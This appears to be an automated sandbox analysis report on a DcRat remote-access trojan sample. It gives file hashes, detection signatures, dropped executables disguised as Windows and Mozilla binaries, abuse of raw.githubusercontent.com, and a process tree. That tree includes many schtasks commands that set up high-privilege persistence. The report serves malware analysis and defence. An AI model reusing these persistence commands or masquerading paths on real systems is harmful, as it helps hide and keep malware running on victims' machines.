memory/888-182-0x0000000000260000-0x0000000000370000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ac29dc62974a46408792a93072a9aabb |
| SHA1 | a754a4813af95c1b516eaf9dbed52602d226fc0b |
| SHA256 | 6d177c3ba044182f4042b70096501b8b29df2bc1658f37483dbbdc0f09825f72 |
| SHA512 | ff1edb2cab366c77c1d85613b1cbfe74567efbb77c6dad9ab0a4892082b2702d7ba38db4220d57ce3a625ed804eb7ae42902ef89275872b758a33c03bc59ad33 |
C:\Users\Admin\AppData\Local\Temp\jkzlbVqk90.bat
| MD5 | 3694d19fae04894cc44849d5dd5298a6 |
| SHA1 | 85f647105984bf9cac0b279052b00e5ba380a7fb |
| SHA256 | 12533a9ee649e8cf3e5b84ad79eab0addcebe53dc0fe85a38e53d2ca54e33771 |
| SHA512 | 88501706dabd2646df9219c90f9730046f5e16540ba999acdcb81eed373440911056f3fcfcaa7d85bd2770061ff5f4ade94ba56371f98aa6c9c465d870c926d7 |
memory/2820-242-0x0000000000920000-0x0000000000A30000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 639054c03c7669c50e4a0d867b225282 |
| SHA1 | 270a5a0c7b8904516db7b84afc023318f0c37c80 |
| SHA256 | 9e8d1e168631b37a78a7f6c423e10cfbe9532655f8503d4d6b99ee5842e2073f |
| SHA512 | 1a26b5469200c8090f18809e0668e104dbfe9d21f0f7d0e803f708ff8f356533ed863c92f0d06add63373b900e8a2479005f08a3d88d07d55a1775ef99e708f7 |
C:\Users\Admin\AppData\Local\Temp\z7AIE64VZ5.bat
| MD5 | affd190a4bb81353cdb1c5806cc384d0 |
| SHA1 | cc6dea4abb949196b18778e08abae6aee970639c |
| SHA256 | 6a29dcbac2b4cb31acbaa9ba369667c0f5e1ad4afbbbf5db2662789acd96e70f |
| SHA512 | cdae6ddcd8e5d9e7bb3b0df19f788c98301e1abe8f82ceefd86a55712042bf10dab9deb4eea44512ae41b7f534ce460da81ad384220a69bb2bd78d055e05e789 |
memory/2740-302-0x00000000012F0000-0x0000000001400000-memory.dmp
memory/2740-303-0x00000000003D0000-0x00000000003E2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 47654a8493fefb428f52abda6d74afa0 |
| SHA1 | 74b971640afa857207ab0a0d2634188811d0c0a9 |
| SHA256 | 563dea0cafcb0b533047f872ea3e6c7650d2a754831f6346aa1d9282e3d26b61 |
| SHA512 | b0b6f90dced5382b02be5fa7dbc0acd674ede43d4e23c87d663ba52a2800b3306edb7895cf6f9d73d373cb1dc89e878be681771e7249ece66fcffa25764187cc |
C:\Users\Admin\AppData\Local\Temp\76lQa6YaxV.bat
| MD5 | 28ce71b4715cd8f1be0a6942690d06f9 |
| SHA1 | 2513b8925d78e53ebafa8b9c305f8a996d1cd4cc |
| SHA256 | 4b8d3a2e063a44935a5f8ecdec8d2de22cea8c5458ecf8c155916b4bba2ab7b2 |
| SHA512 | 354fddb5c290b4c6dc39b79d53ee52abe915672993cac00f2aa0fdb22fd298d9b368756d6d0e8151c688d3704082fe3339b9a6666bb2f81d2e299dbe4fc86eb3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8a71ebcae2f4958c7b1316379d647899 |
| SHA1 | b14bcebd07556b89c22d1848572fce72307a3f37 |
| SHA256 | 97b2e636738b891e875c75fa94b44f7be5b1504acf216a9187127cc45bd73586 |
| SHA512 | 6ef034aa3df95a98c0b25662d6ae2f3cc11438164bdcf36fc44f4b91066b79bbee15390235363e8f36592cb189b662c4a69b8e37f38429b1f71aba4599d92567 |
C:\Users\Admin\AppData\Local\Temp\QqrgVo7Q94.bat
| MD5 | 1c9ce1144777c4b5c4e2a3b6f1f67e70 |
| SHA1 | 81430a656b4b542989705fdcc44da3d9670a9fd4 |
| SHA256 | f15e295c8d06b8bad7575df8342e66b10d003600078bf35f01161ade93daa972 |
| SHA512 | a90b1f437480c15434009ebd149f2100b34749bc589188b8d69d6efa8d810fa79cc763c88b946ecb99b574f6b48eb26bb127f0e97abc62ddf506f9b0710283fb |
memory/2060-422-0x0000000000250000-0x0000000000262000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | cc75d7f89ec50b1b30710b9df99b93ce |
| SHA1 | 5e7a310a415e5a731b2ae39203bfcea5b9a7f806 |
| SHA256 | d2dbd376f477913cdb3b768270bc2b5f803de6e0ef8382d6324e76550dd647a9 |
| SHA512 | ab8cecbd8e48de0c5e49561fadd242e0c5094fc8fa46ba76b08e3a3ac4fc96da8814ec8c40b89bb65576ae5d94f1d1cef69fe3c565df6d75d43dd22ceb2a4ef0 |
C:\Users\Admin\AppData\Local\Temp\F82V1kRox2.bat
| MD5 | 617a257eeffb794f24bcc0289bb18721 |
| SHA1 | e6ab3580e863e2ad680f6018efe189d2d4dd1d66 |
| SHA256 | 73476f563577581655fae373fedcc260428f3820bf0e439053cecde2f3fc2968 |
| SHA512 | c1332aa48c7056ea34ee8f70dda9aedb42cdb34cd7ae4f9ef839dcd92839b96aca93718183434267a9f2f5285d0496ddee1764a21bbdd8d1585c3a681ee258f0 |
memory/2448-482-0x0000000000680000-0x0000000000692000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4cada96f2f2530384cd9d9ea099389b5 |
| SHA1 | 845d7517b7676243cd0f46e0a58f4c7174a67f6a |
| SHA256 | 8dfb21fafe863caba77e1bbbb25de2cf6038bac7496009ff80fe726b21990847 |
| SHA512 | b96815fe84987bf3e9a56d51470b0e891bb35819b725633858fd57ab562004eff2b0f2a31e000cc014d3154e685cc9e53b8c766a637f706047404859764392a9 |
C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat
| MD5 | 10fce3327ccc45097f0d82e4b7d6ac39 |
| SHA1 | d538508dd88535e176d4156f947c692969c28c81 |
| SHA256 | ab8054c73503e2fcf2f5d8477da117886a2556b98a3dbf8f024f9997fadca8d7 |
| SHA512 | 1d27d6b083dce8e1b13505fbaceabe62f52f4c26d1dd4a90a475e8d685bdab7f56a747490a0a9eb28cde22f9aa81c5bc0b0dd005817d56b65ed881589f6e1623 |
memory/2188-542-0x0000000000250000-0x0000000000262000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dc8b714c3cdb7ebb8821466d510a4f83 |
| SHA1 | e15ede3bb0fa1c9ff275accd641fd378a376bb8c |
| SHA256 | 9f4265e2678258e9f527d1a20dfd06705c2f494df00f329278c9ee6d122cea4c |
| SHA512 | 2caa00d23048b564236ff2ee65dbaa3a374d71ae9e804f6c9dd43b2d3104d2b7a13f4f49665a57fea36ed60f9d893ae1bdd1e4ba0e5bf561365b0a5b0248d31c |
C:\Users\Admin\AppData\Local\Temp\2wrSnsL5gc.bat
| MD5 | c29658f77cf4c9a90c8386f44e134043 |
| SHA1 | 31448b35337beec91241fb2dffa450ff24ae98c0 |
| SHA256 | cafcc0762edcb04f3050e857c1d4f07ae150a68fdc7e864bb3f50786a2b805de |
| SHA512 | c76bd80d4db1be4f654ea48f588b91ed008ae4c1c7cc98a82208d236639c6926c7a6c00b1fe4a1eb7dba9a3431b8fa1e07b0ea6213b56f7bb9ba51da42f6b567 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 46f5eea86880bfc6bc71852be1b7a0fe |
| SHA1 | 4b824d2886f5c0734d683b16967e7101c85686f8 |
| SHA256 | 578a0cea70e6524dab39695546f872d818a45371819726413b3d68d807d1e913 |
| SHA512 | 689a943b8d188184366f4c0378ea13824b8989c5ee545eaf861e325ba3033136dab407c670b6826f1a72a8e72d4ecabd172d78d4c46cbacf11efcaa78e81d871 |
C:\Users\Admin\AppData\Local\Temp\WtQmBjXbDh.bat
| MD5 | 98af29fab26806fbbe82f375a164ef86 |
| SHA1 | 5eaa9bb1a72768ecee367a71189344cec2b7be97 |
| SHA256 | 197598a944d1ed1cc1926ec2c0226abc70853d8e7e5fe0a096fee387bab289fb |
| SHA512 | 76b4742bcf3817a373465514192cd7e109d0616c3841aa48af484b56c8accd1c300823330f71a929e6e1a2b914e6ad6e7910b2a703414dad29bdca93c1ef1ee0 |
memory/3000-661-0x0000000000450000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 61ea5ee42951de8340d5c5859bf72e35 |
| SHA1 | 6e19f9256bb476d8ebc3af479060bc4f2c198921 |
| SHA256 | c76feb2330c1f12274e516e1954727e200404ee67e8e3d9b75e6fe8e5cd6b2a1 |
| SHA512 | 57ee5c4dc1955a172ff4f36e0af241d96e295e00e902245b5de06f31708d1a40c0e5467cc75e064c74ec262c931fe5ca54901b1e4d155a5217296fd42eea9ed5 |
C:\Users\Admin\AppData\Local\Temp\D6YKtyItKL.bat
| MD5 | d524cc415175928398a6e342ea6bf986 |
| SHA1 | 48875f684c655bbd45d885f482cdcde1b412d2c3 |
| SHA256 | cecd87a77dabd38216695b67ebae4ec3bc3d4f77cf2ac3ecdfefc169de71a15e |
| SHA512 | edfeac2b4cdae37847ad326d364e9a0039c94778371537d6f2f7a2af854b52819e133a9bac9a46739cb9c64173dca6bf2012562fb1fc9b3b14a496287bc514b0 |
memory/2084-721-0x00000000000F0000-0x0000000000200000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c74ea9a31c44d1ed2fbef985724b1564 |
| SHA1 | 36d3e584f7b33a1f7fcbf38590d85e00db06d099 |
| SHA256 | 84fab8c8d2d1f33b2e0b137010a1756c4adf51ad512f3c65201cb549f1b6970f |
| SHA512 | 4d4fc13e2785e1209f3928c8479ba9362b8cd198df1b0384eda0d3a6be05079828c9208d9e092358c5f669f10314c1448e92d91f1909ceb6f16b058e73e3d648 |
C:\Users\Admin\AppData\Local\Temp\eTpA0L9dlX.bat
| MD5 | b548a44a1bf5c7b5916b4d069da0184f |
| SHA1 | 4065267d7046352497ed4ac87a00a1cfd8769197 |
| SHA256 | 78eacfb90de18b4ad0cadff72243e981b2f9aea2752b799e4cff3d0149e11f8c |
| SHA512 | f7f0f078940e695aaa071aef0f59e3a59bcbaaa01afdb3c2d54581c04f41d6b340d6de9bba61483c55835578a70c305f276aeed9b193d0bf48bd7431123eff3b |
memory/1992-781-0x0000000000360000-0x0000000000470000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-30 02:14
Reported
2024-12-30 02:16
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\providercommon\DllCommonsvc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\3D Objects\services.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\providercommon\DllCommonsvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
| N/A | N/A | C:\Users\Admin\3D Objects\services.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Multimedia Platform\29c1c3cc0f7685 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Mozilla Maintenance Service\services.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Mozilla Maintenance Service\c5b4cb5e9653cc | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\ebf1f9fa8afd6d | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Portable Devices\sppsvc.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Portable Devices\0a1fd5f707cd16 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\cmd.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows Portable Devices\f3b6ecef712a24 | C:\providercommon\DllCommonsvc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\GameBarPresenceWriter\Idle.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\6ccacd8608530f | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\Sun\fontdrvhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\Sun\5b884080fd4f94 | C:\providercommon\DllCommonsvc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\providercommon\DllCommonsvc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | C:\Users\Admin\3D Objects\services.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Templates\unsecapp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Admin\Templates\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Templates\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Documents\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\Documents\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
